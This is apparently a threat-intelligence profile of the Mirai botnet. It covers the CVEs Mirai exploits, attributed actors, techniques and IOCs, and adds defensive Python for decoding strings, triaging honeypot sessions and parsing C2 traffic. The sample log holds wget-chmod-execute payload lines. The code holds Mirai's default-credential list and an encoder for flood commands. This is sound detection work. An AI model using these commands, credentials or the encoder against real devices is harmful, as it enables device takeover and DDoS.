Mirai
Mirai is a Linux/IoT malware botnet best known for infecting internet-exposed IoT devices using default or weak credentials, especially via Telnet, and enrolling them into command-and-control infrastructure for distributed denial-of-service attacks. Reporting describes Mirai operators scanning the internet for IoT devices such as IP-connected security cameras and DVRs and compromising them at scale by logging in with factory credentials that had never been changed. Mirai became the defining example of insecure-IoT exploitation in 2016, when it caused major disruption including the October 2016 attack on Dyn that took down large parts of East Coast internet access, and because its source code was released publicly that same year, variants are still circulating nearly a decade later.
The malware targets Linux-based embedded systems and broader IoT/network edge devices. Across the reporting collected here, Mirai and Mirai-derived variants are associated with routers, modems, IP cameras, NVRs, DVRs, NAS devices, Android-based devices, and other embedded platforms. Multiple reports note multi-architecture support (payloads are built per CPU architecture, such as ARM, MIPS and x86, and the loader picks the right one for the victim) and widespread code reuse from the original source, which lets both skilled and unskilled actors produce new variants.
Observed infection vectors in the content include brute-forcing Telnet and SSH with weak credentials; exploitation of exposed services and known vulnerabilities such as CVE-2021-27137 in DD-WRT UPnP, CVE-2022-22954, CVE-2023-1389 in TP-Link Archer AX21 routers, CVE-2017-5638 in Apache Struts, GPON flaws CVE-2018-10561 and CVE-2018-10562, and Log4Shell/CVE-2021-44228; and active exploitation of hosting/control-panel flaws including CVE-2026-48172 in the LiteSpeed User-End cPanel Plugin and references to CVE-2026-41940 being used to drop Mirai and ransomware. Typical Mirai-based behavior noted in the content includes internet scanning, downloader/execution chains, architecture-specific payload deployment, C2 beaconing, and DDoS functionality. One cited description states that Mirai-infected devices are controlled by a CnC server and used to launch DDoS attacks. Another notes that typical Mirai-based botnets often do not survive reboot, although variants continue to reinfect vulnerable devices: the bot runs from memory and the original code installs no persistence, so a reboot clears it, but a device left exposed with the same credentials or the same unpatched service is usually reinfected within minutes. Remediation therefore means changing credentials, patching or isolating the device, not just power-cycling it.
The content links Mirai to numerous derivative or related botnets and campaigns, including LiquorBot, Aquabot, Satori/Okiru, Sora, Nosedive, and multiple unnamed Mirai variants. Mirai-derived tooling is described as being reused in campaigns targeting both consumer IoT and enterprise-facing systems. A Mirai variant called Nosedive is identified as the primary payload in the Chinese-linked Raptor Train botnet, which the FBI and Black Lotus Labs linked to Flax Typhoon and reported had infected more than 260,000 networking and IoT devices globally. Other reporting in the content notes Mirai botnet variants being deployed alongside ransomware, exploitation of Log4j by Mirai, and Mirai-family infrastructure participating in DDoS activity during the Russia-Ukraine conflict.
High-confidence indicators and detections mentioned directly in the content include Fortinet detection names such as ELF/Mirai.EGX!tr and Linux/Mirai.Y!tr.bdr, and infrastructure from specific Mirai-related reporting including l[.]ocalhost[.]host:47883, 5.182.211.5, 209.141.33.208, linuxuclib[.]com:8080, and jbeupq84v7.2y[.]net. One variant analysis also notes the key used for Mirai's XOR-based string obfuscation as 0xdeadf00d (the original leaked source used 0xdeadbeef). The key is a useful pivot because the decoded string table exposes the C2 hostname, scanner credentials and other hard-coded strings that a given variant carries.
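To make the obfuscation-key note above actionable, here is an added example (not code from the page, from Mirai, or from any vendor it cites) that decodes a Mirai-style string table. In the leaked bot source each table entry is XORed byte by byte with the four bytes of a 32-bit key, applied one after another, which collapses to a single-byte XOR; the block shows that reduction, decodes a constructed blob locked with the reported variant key 0xdeadf00d, and recovers the effective key byte from a known plaintext when the 32-bit key is unknown. The NUL-separated blob layout is an assumption made for the example; real samples store each entry with its own length.

```python
"""Decode Mirai-style XOR-obfuscated configuration strings.

Added example; not code from the page, from Mirai, or from any vendor it cites.
The leaked Mirai bot keeps its strings (C2 host, scanner credentials,
User-Agent values) in a table whose bytes are XORed with the four bytes of a
32-bit key, k1..k4, applied one after another. The original source used
0xdeadbeef; the variant analysis on this page reports 0xdeadf00d. Because each
byte sees all four key bytes, the whole scheme collapses to a single-byte XOR.
The NUL-separated blob layout below is constructed for the example.
"""


def effective_xor_byte(table_key: int) -> int:
    """Fold a 32-bit table key into the single byte it is equivalent to."""
    k = table_key & 0xFFFFFFFF
    return (k & 0xFF) ^ ((k >> 8) & 0xFF) ^ ((k >> 16) & 0xFF) ^ ((k >> 24) & 0xFF)


def toggle_obf(data: bytes, table_key: int) -> bytes:
    """Mirai's toggle: XOR every byte with k1, k2, k3, k4 in turn.

    The operation is its own inverse, so it both locks and unlocks an entry.
    """
    k1 = table_key & 0xFF
    k2 = (table_key >> 8) & 0xFF
    k3 = (table_key >> 16) & 0xFF
    k4 = (table_key >> 24) & 0xFF
    return bytes((((b ^ k1) ^ k2) ^ k3) ^ k4 for b in data)


def decode_table(blob: bytes, table_key: int) -> list:
    """Unlock a blob of NUL-terminated entries and return the plaintext strings."""
    return [chunk.decode("latin-1")
            for chunk in toggle_obf(blob, table_key).split(b"\x00") if chunk]


def recover_key_byte(blob: bytes, known_plaintext: bytes) -> list:
    """Unknown key: try all 256 single-byte keys and keep those under which a
    string you expect in the table (e.g. b'/proc/') appears in the output."""
    return [key for key in range(256)
            if known_plaintext in bytes(b ^ key for b in blob)]


# Constructed sample: three entries locked with the reported variant key
# 0xdeadf00d. Not derived from a real sample.
SAMPLE_KEY = 0xDEADF00D
SAMPLE_BLOB = toggle_obf(b"cnc.example.invalid\x00/proc/cpuinfo\x00admin\x00", SAMPLE_KEY)

if __name__ == "__main__":
    print(hex(effective_xor_byte(0xDEADBEEF)), hex(effective_xor_byte(SAMPLE_KEY)))
    print(decode_table(SAMPLE_BLOB, SAMPLE_KEY))
    print(recover_key_byte(SAMPLE_BLOB, b"/proc/"))
```

Because the scheme is a single-byte XOR in disguise, a known string such as /proc/ or a User-Agent fragment is enough to recover the key from a stripped sample; once decoded, the table gives you the C2 host and the credential list to add to the indicators above.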
Vulnerabilities exploited
33 CVEs correlated with this family across public research and vendor advisories.
CVE-2023-26801 (https://www.akamai.com/blog/security-research/cve-2023-26801-exploited-spreading-mirai-botnet): LB-LINK BL-AC1900_2.0 v1.0.1, LB-LINK BL-WR9000 v2.4.9, LB-LINK BL-X26 v1.2.5, and LB-LINK BL-LTE300 v1.0.8 were discovered to contain a command injection vulnerability via the mac, time1, and time2 parameters at /goform/set_LimitClient_cfg.
CISA has added CVE-2026-48172 to its Known Exploited Vulnerabilities catalog, confirming active exploitation in the wild. The flaw is a maximum-severity privilege escalation vulnerability (CVSS v4.0: 10.0) residing in the LiteSpeed User-End cPanel Plugin versions 2.3 through 2.4.4... Active exploitation has been observed deploying Mirai botnet variants and a ransomware strain called “Sorry.”
Krell added that CVE-2026-41940 compromised approximately 44,000 cPanel servers less than a month ago. Itai Goldman, co-founder and CTO at Miggo Security, added that in the first case with CVE-2026-41940, a critical 9.8 cPanel bug was weaponized to drop Mirai and ransomware at scale across the same hosting stack.
The primary vulnerability at the center of the event and this review (CVE-2021-44228) will be known as the Log4j vulnerability... Analysts at the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) assessed CVE-2021-44228 as a critical vulnerability with a Common Vulnerability Scoring System (CVSS) Base Score of 10.0. Cisco Talos observed the Internet-of-Things botnet known as Mirai exploiting Log4j.
CVE-2022-22954, a remote code execution (RCE) vulnerability due to server-side template injection in VMware Workspace ONE Access and Identity Manager, is trivial to exploit with a single HTTP request to a vulnerable device. We observed several instances of CVE-2022-22954 being exploited to drop variants of the Mirai malware. Instead, they were either non-specific Mirai variants or contained previously known exploits such as CVE-2017-17215.
Researchers warn the observed payloads share similarities to those found in malware used in Mirai-like botnets. The Cybersecurity and Infrastructure Security Agency previously added the command injection vulnerability, tracked as CVE-2023-33538, to its Known Exploited Vulnerabilities catalog in July 2025. Palo Alto Networks telemetry detected large-scale exploitation attempts at the time.
Tracked as CVE-2023-1389, the flaw is a high-severity unauthenticated command injection problem in the locale API reachable through the TP-Link Archer AX21 web management interface. Following that, cybersecurity teams warned about multiple botnets, including three Mirai variants ... that targeted unpatched devices.
Unit 42 has uncovered new variants of the well-known IoT botnets Mirai and Gafgyt. These variants are notable for two reasons: The new Mirai version targets the same Apache Struts vulnerability associated with the Equifax data breach in 2017. The exploit targeting Apache Struts in the new variant we found targets CVE-2017-5638, an arbitrary command execution vulnerability via crafted Content-Type, Content-Disposition, or Content-Length HTTP headers.
CVE-2017-6884 Zyxel routers GET /cgi-bin/luci/... nslookup ? ...
CVE-2018-10561, CVE-2018-10562 Dasan GPON routers Similar to previous campaigns. Gigabit-capable Passive Optical Network (GPON) routers manufactured by DASAN Zhone Solutions have been found vulnerable to an authentication bypass (CVE-2018-10561) and a root-RCE (CVE-2018-10562) flaw that together allow remote attackers to take full control of the device. Mirai Botnet (new variants): the GPON exploit has also been integrated into a few new variants (operated by different hacking groups) of the infamous Mirai IoT botnet, which first emerged and was open-sourced in 2016 after it was used to launch record-breaking DDoS attacks.
This led to their participation in a Thingbot (a botnet built out of IoT devices) named Mirai that launched massive distributed denial-of-service (DDoS) attacks against a handful of victims, including Dyn, OVH, KrebsOnSecurity, and Rutgers University in late 2016. The Janit0r took it upon himself to destroy IoT devices so they couldn’t become infected by Mirai, starting with the “colossally dangerous CVE-2016-10372 situation.” The situation referenced was considered dangerous because it allowed attackers to send remote commands to affected devices from anywhere on the Internet (WAN port) and then reconfigure the devices to allow further remote access.
Researchers have uncovered an active Mirai botnet campaign exploiting CVE-2025-29635, a command-injection vulnerability in legacy D-Link DIR-823X routers, to recruit internet-exposed devices into a distributed denial-of-service (DDoS) botnet. Attackers deploy a Mirai malware variant known as “tuxnokill,” which establishes command-and-control (C2) communication, spreads to additional vulnerable IoT devices, and prepares infected systems for large-scale DDoS operations.
The first major wave of such activity was exemplified by the Mirai botnet, which demonstrated how trivial authentication weaknesses could generate terabit-scale attacks targeting global infrastructure.
CVE-2022-36553: A command injection vulnerability in the popen.cgi component of Hytec Inter HWL-2511-SS devices allows an authenticated attacker to execute arbitrary commands.
CVE-2025-9528: A vulnerability in the Linksys E1700 router's systemCommand function allows an authenticated remote attacker to perform OS command injection.
CVE-2024-3721: A critical command injection vulnerability in certain TBK DVR models allows an unauthenticated remote attacker to execute arbitrary commands via crafted HTTP requests.
CVE-2025-4008: A command injection vulnerability in the web interface of Meteobridge allows a remote, unauthenticated attacker to execute arbitrary commands with root privileges.
CVE-2025-34043: A remote command injection vulnerability in Vacron Network Video Recorder (NVR) devices allows unauthenticated attackers to execute arbitrary commands on the operating system.
CVE-2014-3206: Seagate BlackArmor NAS products are vulnerable to remote command execution via the session and auth_name parameters in certain web endpoints.
CVE-2020-10987: The setUsbUnload endpoint in Tenda AC15 and AC1900 routers contains a command injection vulnerability that allows an unauthenticated remote attacker to execute arbitrary system commands.
CVE-2020-9054: A command injection vulnerability in the weblogin.cgi component of multiple Zyxel NAS products allows an unauthenticated remote attacker to execute arbitrary OS commands.
CVE-2024-10914: An unauthenticated remote command injection vulnerability in legacy D-Link NAS devices, particularly in the account_mgr.cgi script, allows an attacker to execute arbitrary shell commands.
CVE-2023-41011: A command execution vulnerability in the shortcut_telnet.cg component of the China Mobile Intelligent Home Gateway v.HG6543C4 allows a remote attacker to execute arbitrary code.
CVE-2013-1599: A command injection vulnerability in the rtpd.cgi component of D-Link IP Cameras allows an unauthenticated remote attacker to execute arbitrary commands via a crafted query string.
CVE-2023-23333: A command injection vulnerability in downloader.php within SolarView Compact devices allows an unauthenticated remote attacker to execute arbitrary commands.
CVE-2022-40619: A firewall authentication bypass vulnerability affects FortiGate, FortiProxy, and FortiSwitchManager, allowing an attacker to perform operations on the administrative interface.
the first exploit used by Okiru is linked to the CVE-2014-8361... Devices using the Realtek SDK with the miniigd daemon are vulnerable to OS command injection attacks in the UPnP SOAP interface.
Black Lotus Labs notes that the botnet was also involved in exploitation attempts against Atlassian Confluence servers and Ivanti Connect Secure appliances (likely via CVE-2024-21887) at organizations in the same activity sectors.
Researchers at VulnCheck flagged in-the-wild exploitation of CVE-2018-5999, a critical flaw carrying a 9.8 CVSS score, to the RondoDox botnet... VulnCheck began observing exploitation of the Asus vulnerability on May 17. 'Public exploits have been available since 2018,' ... 'But until now, we hadn't seen the vulnerability exploited in the wild.'
CVE-2024-41710 is a command injection vulnerability that affects Mitel 6800, 6900, and 6900w series SIP phones, including the 6970 Conference Unit through R6.4.0.HF1 (R6.4.0.136)... Akamai SIRT detected exploit attempts targeting this vulnerability through our global network of honeypots in early January 2025... This payload will attempt to fetch and execute a shell script called “bin.sh”, which will in turn fetch and execute Mirai malware on the target system.
Groups observed using it
6 distinct threat actors attributed by public researchers.
FBI Director Chris Wray last Wednesday disclosed an operation to disrupt a Mirai-variant botnet that has exploited more than 260,000 IoT devices globally.
The operator -- a Chinese-speaking actor using the handle angelalk21 (QQ: 597118859, Telegram: @Kuru_x86) -- runs a Mirai-fork botnet with a novel DNS byte-swap anti-analysis technique that causes passive DNS researchers to track decoy IPs in Japan and the US while the real C2 sits in Germany.
...ultimately deploying the Mirai botnet malware and other DDoS-related programs on compromised devices and servers.
Hackers are exploiting vulnerabilities in end-of-life GeoVision IoT devices and Samsung’s MagicINFO server to expand the Mirai botnet... Akamai observed attacks in April targeting GeoVision devices... to download and run an ARM variant of Mirai dubbed LZRD.
They have employed botnets such as those based on DieNet or Mirai variants for DDoS attacks...
Techniques & procedures
19 distinct techniques documented for this family, organized by ATT&CK tactic.
Reconnaissance (2 techniques)
Vendors like one cybersecurity technology services company observed the use of botnets to automate the reconnaissance process to quickly identify vulnerable targets.
Five days following the flaw’s disclosure, Cloudflare observed 400 exploitation attempts per second, totaling millions of scanning attempts to identify vulnerable systems.
Resource Development (2 techniques)
Black Lotus Labs began an investigation into compromised routers that led to the discovery of a large, multi-tiered botnet consisting of small office/home office (SOHO) and IoT devices... We call this botnet “Raptor Train.”
Mirai’s operators scanned the internet for IoT devices, including large numbers of IP-connected security cameras and DVRs, and compromised them at scale... Those compromised cameras were recruited into a botnet...
Initial Access (2 techniques)
Mirai’s operators scanned the internet for IoT devices, including large numbers of IP-connected security cameras and DVRs, and compromised them at scale by logging in with factory credentials that had never been changed.
Krell added that CVE-2026-41940 compromised approximately 44,000 cPanel servers less than a month ago, so a second critical zero-day in the same ecosystem is a pattern.
Execution (3 techniques)
There is no race condition to win, nor an authentication gap to bridge — a single malformed API call with the right parameter values is sufficient to escalate to root.
The attack begins with a compact shell script called Universal Bot Downloader that automatically identifies the victim system’s CPU architecture using the uname -m command.
Analysts at the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) assessed CVE-2021-44228 as a critical vulnerability with a Common Vulnerability Scoring System (CVSS) Base Score of 10.0... This reflected the fact that exploitation of the flaw required low attack complexity, no privilege requirements, and no user interaction.
Persistence (1 technique)
Privilege Escalation (2 techniques)
Firmware had no update path. And in 2016, Mirai – a botnet that exploited exactly those weaknesses – tore through connected devices worldwide.
Stealth (1 technique)
Credential Access (1 technique)
Our research’s contribution lies in confirmatory validation: combining theoretical insights from prior literature with direct observation of real-world attack patterns to confirm the persistence of known behaviors, including credential brute-forcing, Mirai-style commands, and Telnet dominance.
Discovery (2 techniques)
Mirai’s operators scanned the internet for IoT devices, including large numbers of IP-connected security cameras and DVRs...
The most frequent command was uname -s -v -n -r -m... Additional commands queried /proc/uptime and /proc/cpuinfo, counted processor cores using grep and wc -l, and inspected the operating system with uname -a and whoami.
Lateral Movement (1 technique)
loader/: Infects vulnerable devices using telnet brute-force
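The Initial Access, Execution, Credential Access, Discovery and Lateral Movement entries above describe one procedure seen end to end on a Telnet honeypot: spraying pairs from the leaked scanner dictionary, the enable/system/shell/sh prelude, a /bin/busybox TOKEN applet probe, uname and /proc reconnaissance, and a wget-chmod-execute chain that fetches a per-architecture payload. The following added example (not code from the page or from any vendor it cites) triages constructed honeypot session lines for that pattern and extracts the payload URLs and target architectures. The log format, the session contents and the "198.51.100.7"/"203.0.113.9" addresses are constructed for the example; MIRAI_DICT is a subset of the pairs hard-coded in the leaked scanner source.

```python
"""Triage Telnet/SSH honeypot sessions for Mirai-style loader behaviour.

Added example, not code from the page or from any vendor it cites. The log
format and the session below are constructed; adapt parse_line() to your
honeypot's own output. MIRAI_DICT is a subset of the leaked scanner list.
"""
import re
from collections import defaultdict
from urllib.parse import urlparse

MIRAI_DICT = {
    ("root", "xc3511"), ("root", "vizxv"), ("root", "admin"), ("admin", "admin"),
    ("root", "888888"), ("root", "xmhdipc"), ("root", "default"), ("root", "juantech"),
    ("root", "123456"), ("root", "54321"), ("support", "support"), ("root", ""),
    ("admin", "password"), ("root", "root"), ("root", "12345"), ("user", "user"),
    ("admin", ""), ("root", "pass"), ("admin", "admin1234"), ("ubnt", "ubnt"),
    ("root", "7ujMko0vizxv"), ("root", "7ujMko0admin"), ("supervisor", "supervisor"),
}
SHELL_PRELUDE = ("enable", "system", "shell", "sh")          # sent blind after login
BUSYBOX_PROBE = re.compile(r"/bin/busybox\s+[A-Z]{4,8}\s*$")  # "applet not found" check
RECON = re.compile(r"\buname\b|/proc/(?:cpuinfo|uptime|mounts)|\bwhoami\b")
FETCH = re.compile(r"\b(?:wget|curl)\b[^;|&]*?(https?://[^\s;|&]+)")
EXEC_CHAIN = re.compile(r"chmod\s+(?:\+x|[0-7]{3})\s+[^\s;]+\s*;\s*(?:\./|sh\s)")
ARCH = re.compile(r"x86_64|x86|i[3-6]86|armv\dl|arm[4-7]?|mipsel|mpsl|mips|sh4|ppc|m68k|spc|arc", re.I)


def parse_line(line: str):
    """'<ts> <src> login <user>:<pass> <success|failed>' or '<ts> <src> cmd <command>'."""
    _ts, src, event, rest = line.split(" ", 3)
    if event == "login":
        cred, result = rest.rsplit(" ", 1)
        user, _, pw = cred.partition(":")
        return src, "login", {"user": user, "pw": pw, "ok": result == "success"}
    return src, "cmd", {"cmd": rest}


def payload_arch(url: str) -> str:
    """Guess the target CPU from the payload file name, e.g. .../bins/mips -> mips."""
    m = ARCH.search(urlparse(url).path.rsplit("/", 1)[-1])
    return m.group(0).lower() if m else "unknown"


def triage(lines):
    """Group lines per source IP and score each session for Mirai-style loader behaviour."""
    sessions = defaultdict(lambda: {"logins": [], "cmds": []})
    for line in lines:
        src, event, data = parse_line(line)
        sessions[src]["logins" if event == "login" else "cmds"].append(data)
    report = {}
    for src, s in sessions.items():
        attempts = [(l["user"], l["pw"]) for l in s["logins"]]
        cmds = [c["cmd"] for c in s["cmds"]]
        urls = [m.group(1) for c in cmds for m in FETCH.finditer(c)]
        ind = {
            "dict_ratio": (sum(a in MIRAI_DICT for a in attempts) / len(attempts)) if attempts else 0.0,
            "prelude": all(p in cmds for p in SHELL_PRELUDE),
            "busybox_probe": any(BUSYBOX_PROBE.search(c) for c in cmds),
            "recon_cmds": sum(bool(RECON.search(c)) for c in cmds),
            "exec_chain": any(EXEC_CHAIN.search(c) for c in cmds),
        }
        score = sum([ind["dict_ratio"] >= 0.5, ind["prelude"], ind["busybox_probe"],
                     ind["recon_cmds"] > 0, ind["exec_chain"]])
        report[src] = {**ind, "download_urls": urls,
                       "payload_archs": [payload_arch(u) for u in urls],
                       "verdict": "mirai-like" if score >= 3 else "suspicious" if score else "clean"}
    return report


# Constructed session log: one Mirai-style loader and one unrelated login.
SAMPLE_LOG = """\
2024-01-01T00:00:01 198.51.100.7 login root:xc3511 failed
2024-01-01T00:00:02 198.51.100.7 login root:vizxv failed
2024-01-01T00:00:03 198.51.100.7 login admin:admin success
2024-01-01T00:00:04 198.51.100.7 cmd enable
2024-01-01T00:00:04 198.51.100.7 cmd system
2024-01-01T00:00:04 198.51.100.7 cmd shell
2024-01-01T00:00:04 198.51.100.7 cmd sh
2024-01-01T00:00:05 198.51.100.7 cmd /bin/busybox ECCHI
2024-01-01T00:00:06 198.51.100.7 cmd uname -s -v -n -r -m
2024-01-01T00:00:06 198.51.100.7 cmd cat /proc/cpuinfo | grep name | wc -l
2024-01-01T00:00:07 198.51.100.7 cmd cd /tmp; wget http://203.0.113.9/bins/x86; chmod +x x86; ./x86; rm -rf x86
2024-01-01T00:00:08 198.51.100.7 cmd cd /tmp; /bin/busybox wget http://203.0.113.9/bins/mips; chmod +x mips; ./mips
2024-01-01T00:01:00 192.0.2.44 login alice:Tr0ub4dor&3 success
2024-01-01T00:01:02 192.0.2.44 cmd ls -la
2024-01-01T00:01:05 192.0.2.44 cmd cat /etc/motd
""".splitlines()

if __name__ == "__main__":
    for src, r in triage(SAMPLE_LOG).items():
        print(src, r["verdict"], r["download_urls"], r["payload_archs"])
```

Scoring on several independent stages rather than on the dictionary alone matters because many non-Mirai scanners reuse the same credential list; the busybox probe, the blind prelude and the multi-architecture fetch chain are what distinguish a Mirai-family loader. The extracted URLs and hosts feed straight into the indicator list, and the architecture names tell you which binaries to pull for analysis.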
Command and Control (3 techniques)
Over the years, IoT botnets have evolved from centralized command-and-control (C2) models toward resilient peer-to-peer infrastructures designed to sustain operations even after partial takedowns.
The binary protocol used by Condi to communicate with the C2 server is a modified version of that initially implemented in Mirai.
Itai Goldman, co-founder and CTO at Miggo Security, added that in the first case with CVE-2026-41940, a critical 9.8 cPanel bug was weaponized to drop Mirai and ransomware at scale across the same hosting stack.
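Since Condi and other forks reuse Mirai's binary C2 protocol with modifications, a decoder for the original framing is the natural starting point for detection signatures or for driving a sample in an isolated lab. The block below is an added example, not code from the page or from the Mirai or Condi authors. It follows the leaked bot source: the C2 sends a 2-byte big-endian length, a zero length being the keepalive reply to the bot's 00 00 ping, and otherwise a body of uint32 duration, uint8 attack vector, uint8 target count, (4-byte IPv4, 1-byte prefix) per target, uint8 option count and (uint8 key, uint8 length, value) per option. The vector and option names are taken from the leaked attack.h as I recall it and should be checked against the sample at hand, since forks renumber them; the frames are constructed, not captured traffic.

```python
"""Decode the bot-side framing of Mirai's C2 protocol.

Added example, not code from the page or from the Mirai or Condi authors.
Layout per the leaked bot source (main.c / attack.c); vector and option names
per attack.h, to be verified against the sample you are analysing. The frames
below are constructed, not captured traffic.
"""
import ipaddress
import struct

VECTORS = {0: "udp", 1: "vse", 2: "dns", 3: "syn", 4: "ack", 5: "stomp",
           6: "greip", 7: "greeth", 9: "udp_plain", 10: "http"}
OPT_NAMES = {0: "payload_size", 6: "sport", 7: "dport", 8: "domain",
             20: "http_method", 22: "http_path"}


def parse_attack(body: bytes) -> dict:
    """Parse one attack command body (the bytes after the length prefix)."""
    duration, vector, ntargs = struct.unpack_from("!IBB", body, 0)
    off = 6
    targets = []
    for _ in range(ntargs):
        ip, prefix = struct.unpack_from("!4sB", body, off)
        off += 5
        targets.append(f"{ipaddress.IPv4Address(ip)}/{prefix}")
    (nopts,) = struct.unpack_from("!B", body, off)
    off += 1
    opts = {}
    for _ in range(nopts):
        key, vlen = struct.unpack_from("!BB", body, off)
        off += 2
        opts[OPT_NAMES.get(key, f"opt{key}")] = body[off:off + vlen].decode("latin-1")
        off += vlen
    if off != len(body):
        raise ValueError("trailing bytes in attack command")
    return {"type": "attack", "duration": duration,
            "vector": VECTORS.get(vector, f"unknown({vector})"),
            "targets": targets, "opts": opts}


def parse_frame(buf: bytes):
    """Return (message, bytes_consumed); (None, 0) if the frame is incomplete."""
    if len(buf) < 2:
        return None, 0
    (length,) = struct.unpack("!H", buf[:2])
    if length == 0:
        return {"type": "keepalive"}, 2
    if len(buf) < 2 + length:
        return None, 0
    return parse_attack(buf[2:2 + length]), 2 + length


def parse_stream(data: bytes) -> list:
    """Walk a reassembled C2->bot TCP stream and decode every complete frame."""
    msgs, off = [], 0
    while off < len(data):
        msg, used = parse_frame(data[off:])
        if msg is None:
            break
        msgs.append(msg)
        off += used
    return msgs


def build_attack(duration: int, vector: int, targets, opts: dict) -> bytes:
    """Encoder for the same layout; used here to construct the sample frames."""
    body = struct.pack("!IBB", duration, vector, len(targets))
    for cidr in targets:
        net = ipaddress.IPv4Network(cidr, strict=False)
        body += struct.pack("!4sB", net.network_address.packed, net.prefixlen)
    body += struct.pack("!B", len(opts))
    for key, val in opts.items():
        body += struct.pack("!BB", key, len(val)) + val.encode("latin-1")
    return struct.pack("!H", len(body)) + body


# Constructed stream: keepalive, a 60 s SYN flood at a /24, then a 120 s HTTP
# flood with destination-port and path options.
SAMPLE_STREAM = (b"\x00\x00"
                 + build_attack(60, 3, ["203.0.113.0/24"], {})
                 + build_attack(120, 10, ["198.51.100.7/32"], {7: "8080", 22: "/"}))

if __name__ == "__main__":
    for msg in parse_stream(SAMPLE_STREAM):
        print(msg)
```

The framing is what makes the traffic recognisable on the wire: a long-lived TCP session whose client sends 00 00 roughly once a minute and receives either 00 00 or a short length-prefixed blob is a strong hint even when the port and C2 host are new. When a fork such as Condi is in play, start from this decoder and adjust the field order and vector numbering against the disassembled attack parser rather than trusting the original table.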
Impact (2 techniques)
A variant of Mirai called LiquorBot was used for cryptocurrency mining.
Those compromised cameras were recruited into a botnet used to launch some of the largest distributed denial-of-service attacks ever recorded, including the October 2016 attack against Dyn that took down Twitter, Reddit, Netflix, and large portions of internet infrastructure for hours.
IOCs tracked for this family
443 indicators attributed across vendor reports, sandbox runs, and researcher write-ups, covering IPs, domains and DNS infrastructure, file hashes (MD5, SHA-1, SHA-256), and other indicator types from public reporting.
Recent activity
200 sources tracked across advisories, community write-ups, and news.
Referenced only via antivirus detection naming in the report; no direct behavioral discussion is provided.
IoT botnet that compromised internet-exposed devices such as security cameras and DVRs using unchanged factory credentials, then recruited them to launch large-scale distributed denial-of-service attacks.
Botnet malware whose variants are being deployed through exploitation of CVE-2026-48172 on vulnerable LiteSpeed User-End cPanel Plugin installations.
Mirai was reportedly deployed at scale via exploitation of a critical cPanel vulnerability in the hosting stack.